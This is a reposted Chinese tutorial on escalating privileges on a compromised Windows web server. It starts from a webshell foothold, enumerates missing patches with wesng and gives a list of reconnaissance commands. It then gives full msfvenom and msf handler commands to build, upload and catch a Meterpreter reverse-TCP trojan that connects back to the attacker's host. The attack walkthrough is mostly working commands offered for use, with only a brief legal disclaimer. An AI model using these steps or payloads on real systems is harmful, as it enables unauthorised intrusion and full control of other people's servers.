权限提升:溢出漏洞.(普通权限 提升 管理员权限.)

news2024/11/24 14:27:25

权限提升:溢出漏洞

权限提升简称提权,由于操作系统都是多用户操作系统用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通过操作系统漏洞或操作系统的错误配置进行提权,也可以通过第三方软件服务,如数据库或 FTP 等软件的漏洞进行提权。


目录:

权限提升:溢出漏洞

windows 常用命令:

从 Web 环境中提权:

第一步:提权是我们已经有木马或其他的方法连接到web网站的目录了.

第二步:进入终端 打印系统信息 保存到一个文件中.

第三步:在目录中找到这个文件进行下载到我们的电脑上.

第四步:下载溢出漏洞的工具.(wesng-master)

第五步:解压好文件,把我们刚刚下载下来的 系统信息文件 放到 wesng-master 中.

第六步:打开命令行,切换到刚刚下载溢出漏洞的工具的目录下.(wesng-master)

第七步:执行溢出漏洞的查找.

第八步:打开 我们把漏洞保存的文件.(vuln1.csv)

第九步:直接在网上搜索漏洞编号进行利用.(建议使用 msf 进行 提权)

 第十步:生成一个后台程序(木马)

第十一步:把刚刚生成的程序 上传到要提权服务器 上.

第十二步:直接在我们的服务器上安装 msf .(这里测试我就直接有 kali 中的 msf 了)

第十三步:在 windows 操作系统执行程序,返回我们服务器( kali )

第十四步:查看权限.(是不是高权限)

第十五步:网上搜索漏洞编号进行使用.(返回这个环境下进行使用漏洞提权)


免责声明:

严禁利用本文章中所提到的技术进行非法攻击,否则后果自负,上传者不承担任何责任。


windows 常用命令:

systeminfo                    //打印系统信息
whoami                        //获得当前用户名
whoami /priv                  //当前帐户权限
ipconfig                      //网络配置信息
ipconfig /displaydns          //显示DNS缓存
route print                   //打印出路由表
arp -a                        //打印arp表
hostname                      //主机名
net user                      //列出用户
net user UserName             //关于用户的信息
net use \SMBPATH Pa$$wOrd /u:UserName       //连接SMB
net localgroup                //列出所有组
net localgroup GROUP          //关于指定组的信息
net view y127.0.0.1           //会话打开到当前计算机
net session                   //开放给其他机器
netsh firewall show config    //显示防火墙配置
DRIVERQUERY                   //列出安装的驱动
tasklist /svc                 //列出服务任务
net start                     //列出启动的服务
dir /s foo                    //在目录中搜索包含指定字符的项
sc query                      //列出所有服务
sc qc ServiceName             //找到指定服务的路径
shutdown /r /t 0              //立即重启
type file.txt                 //打印出内容
icacls “C:\Example"            //列出权限
wmic qfe get Caption,Description,HotFixlD,InstalledOn   //列出已安装的布丁      

权限提升:溢出漏洞.

从 Web 环境中提权:

第一步:提权是我们已经有木马或其他的方法连接到web网站的目录了.(一般用一句话木马.


第二步:进入终端 打印系统信息 保存到一个文件中.

systeminfo > systeminfo.txt


第三步:在目录中找到这个文件进行下载到我们的电脑上.(一般就在我们输入命令的那个目录上


第四步:下载溢出漏洞的工具.(wesng-master

GitHub - bitsadmin/wesng: Windows Exploit Suggester - Next Generation


第五步:解压好文件,把我们刚刚下载下来的 系统信息文件 放到 wesng-master 中.


第六步:打开命令行,切换到刚刚下载溢出漏洞的工具的目录下.(wesng-master


第七步:执行溢出漏洞的查找.

python wes.py systeminfo.txt -o vuln1.csv

python :使用python
wes.py :是工具
systeminfo.txt    //是我们刚刚从服务器下载的文件
-o vuln1.csv      //是把这个结果保存到这个文件vuln1.csv中.


第八步:打开 我们把漏洞保存的文件.(vuln1.csv


第九步:直接在网上搜索漏洞编号进行利用.(建议使用 msf 进行 提权


第十步:生成一个后台程序(木马)

后台程序(木马):https://tianyuk.blog.csdn.net/article/details/123541093

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.105 
lport=4444 -f exe > bgxg.exe

// lhost=kali的IP地址 
// lport=端口号(比如4444) 
// -f exe > 文件名.exe


第十一步:把刚刚生成的程序 上传到要提权服务器 上.


第十二步:直接在我们的服务器上安装 msf .(这里测试我就直接有 kali 中的 msf 了)(二个服务器要可以互通

msfconsole            //打开 msf 命令

use exploit/multi/handler        //加载模块

set payload windows/meterpreter/reverse_tcp  
// payload 命令:(记得设置的 windows/meterpreter/reverse_tcp 要和程序的一样)   

set lhost 192.168.0.105
//设置本地监听 IP(就是 kali 的 IP)命令:(记得设置的 IP 要和程序的一样)

set LPORT 4444
//设置本地监听端口(就是 kali 的 端口)命令:(记得设置的 端口 要和程序的一样)

run                //执行命令


第十三步:在 windows 操作系统执行程序,返回我们服务器( kali )


第十四步:查看权限.(是不是高权限),如果不是则 直接在网上搜索漏洞编号进行利用.(建议使用 msf 进行 提权

getuid  


第十五步:网上搜索漏洞编号进行使用.(返回这个环境下进行使用漏洞提权

    

      

    

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/460381.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

日增百亿数据,查询结果秒出, Apache Doris 在 360商业化的统一 OLAP 应用实践

导读: 360商业化为助力业务团队更好推进商业化增长,实时数仓共经历了三种模式的演进,分别是 Storm Druid MySQL 模式、Flink Druid TIDB 的模式 以及 Flink Doris 的模式,基于 Apache Doris 的新一代架构的成功落地使得 360商…

“不幸的是,你知道的太多了”

《平凡的世界》里有一段话是这么说的:“谁让你读了这么多书,又知道了双水村以外还有个大世界。 如果从小你就在这个天地里日出而作,日落而息,那你现在就会和众乡亲抱同一理想,经过几年的辛劳,像大哥一样娶…

PHP 实现会话Session信息共享

目录 解决方案也有很多种: 会话保持 会话复制 会话共享 环境准备 架构设计 SessionHandlerInterface接口 代码编写 总结 优化 前言: 小流量的网站中,我们往往只需要一台服务器就可以维持用户正常的访问以及相关的操作。 随着网站的…

Superset整合keycloak系统

本篇主要介绍superset如何整合单点登陆系统keycloak,现在网上的博客大部分都是失效了,这里我相当于更新一下,避免大家再走弯路 一、环境配置 Macos keycloak:18.0.0 superset:2.1.0 keycloak规定:每一…

原理这就是索引下推呀

前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家。点击跳转到网站。 索引下推是之前面试的时候遇到的一个面试题,当时没有答上来,今天来学习一下。 介绍索引下推之前先看一下MySQL基…

2022年NOC大赛创客智慧编程赛道图形化scratch复赛题,包含答案解析

目录 2022 年 NOC 大赛创客智慧编程图形化复赛用题 下载文档打印做题:

ArcGIS Pro、Python、USLE、INVEST模型等多技术融合的生态系统服务构建生态安全格局

第一章、生态安全评价理论及方法介绍 一、生态安全评价简介 ​ 二、生态服务能力简介 ​ 三、生态安全格局构建研究方法简介 ​ 第二章、平台基础一、ArcGIS Pro介绍1. ArcGIS Pro简介2. ArcGIS Pro基础3. ArcGIS Pro数据编辑4. ArcGIS Pro空间分析5. 模型构建器6. ArcGIS Pro…

命令执行的判断根据:;、、

文章目录 命令执行的判断根据:;、&&、||cmd ; cmd(不考虑命令相关性的连续命令执行)$?(命令返回值)与&&或||使用案例例题 命令执行的判断根据:;、&&、|| 在某些情况下,我想要一次执行很多命令,而不想分…

【jvm系列-10】深入理解jvm垃圾回收器的种类以及内部的执行原理

JVM系列整体栏目 内容链接地址【一】初识虚拟机与java虚拟机https://blog.csdn.net/zhenghuishengq/article/details/129544460【二】jvm的类加载子系统以及jclasslib的基本使用https://blog.csdn.net/zhenghuishengq/article/details/129610963【三】运行时私有区域之虚拟机栈…

JavaScript字符串操作

ASCII(as key) 字符集(了解) 我们都知道,计算机只能存储 0101010 这样的二进制数字,那么我们的 a ~ z / A ~ Z / $ / /… 之类的内容也有由二进制数字组成的 我们可以简单的理解为, a ~ z / …

浅谈文心一言

作者简介: 辭七七,目前大一,正在学习C/C,Java,Python等 作者主页: 七七的个人主页 文章收录专栏: 七七的闲谈 欢迎大家点赞 👍 收藏 ⭐ 加关注哦!💖&#x1f…

[oeasy]python0140_导入_import_from_as_namespace_

导入import 回忆上次内容 上次学习了 tryexcept 注意要点 半角冒号缩进输出错误信息 有错就报告 不要隐瞒否则找不到出错位置还可以用traceback把 系统报错信息原样输出 但是代码量好多啊 10多 行了 🤯可以把他输入部分和输出部分么?🤔 我…

【计算机组成原理】第四章 指令系统

系列文章目录 第一章 计算系统概论 第二章 运算方法和运算器 第三章 多层次的存储器 第四章 指令系统 第五章 中央处理器 第六章 总线系统 第七章 外围设备 第八章 输入输出系统 文章目录 系列文章目录前言第四章 指令系统4.1 指令系统的发展与性能要求4.1.1 指令系统的发展4…

CTR-GCN 代码理解

论文代码:https://github.com/Uason-Chen/CTR-GCN ctrgcn.py 文件路径:CTR-GCN/model/ctrgcn.py import math import pdbimport numpy as np import torch import torch.nn as nn from torch.autograd import Variabledef import_class(name):compone…

动态设置图片的主题色(保留明暗关系)

github地址 PrimaryColorDemo 效果 原始图片 就是一张普通的png图片 根据选择的主题色动态渲染。 思考 最近在思考怎么实现动态的设置图片的主题色。不是那种渲染透明iocn。而是把图片的明暗关系保留。而改变其中的主题色。终于花了半天的时间研究出来了。和大家共享。 …

AI对话AI才是正解?KAUST研究团队提出基于角色扮演的大模型交互代理框架CAMEL

电影《盗梦空间》中有这样一句非常经典的台词: “世上最具有可塑性的寄生虫是什么?是人类的想法。人类大脑中一个简单的想法,就可以建立一座庞大的城市。有时一个想法也可以改变世界,并改写一切规则,这就是我为什么要…

0703齐次方程-微分方程

文章目录 1 定义和解法1.1 定义1.2 微分方程中的变量替换1.3 齐次方程的解法 2 例题结语 1 定义和解法 1.1 定义 形式上可化为 d y d x g ( y x ) \frac{dy}{dx}g(\frac{y}{x}) dxdy​g(xy​)的方程,称为齐次方程。 例如 d y d x y x tan ⁡ y x , d y d x e y…

操作系统考试复习—第二章 2.1 2.2程序和进程的描述

第二章 进程的描述与控制 程序:有序的指令集合 程序顺序执行的特征:1.顺序性 2.封闭性 3.可再现性(确定性) 在多道程序环境下,允许多个程序并发执行,此时他们将失去封闭性,并具有间断性和不可再现性的特征。为此引…

net::ERR_CONTENT_LENGTH_MISMATCH 206 (Partial Content) 报错

一、问题描述 最近现场实施人员反馈有个功能不能正常使用,F12查看浏览器的控制台,提示net::ERR_CONTENT_LENGTH_MISMATCH 206 (Partial Content)的错误, HTTP状态码206表示“部分内容”(Partial Content),…

全网最细,Jmeter性能测试-分布式压力测试环境搭建(超详细)

目录:导读 前言一、Python编程入门到精通二、接口自动化项目实战三、Web自动化项目实战四、App自动化项目实战五、一线大厂简历六、测试开发DevOps体系七、常用自动化测试工具八、JMeter性能测试九、总结(尾部小惊喜) 前言 JMeter设计之初是…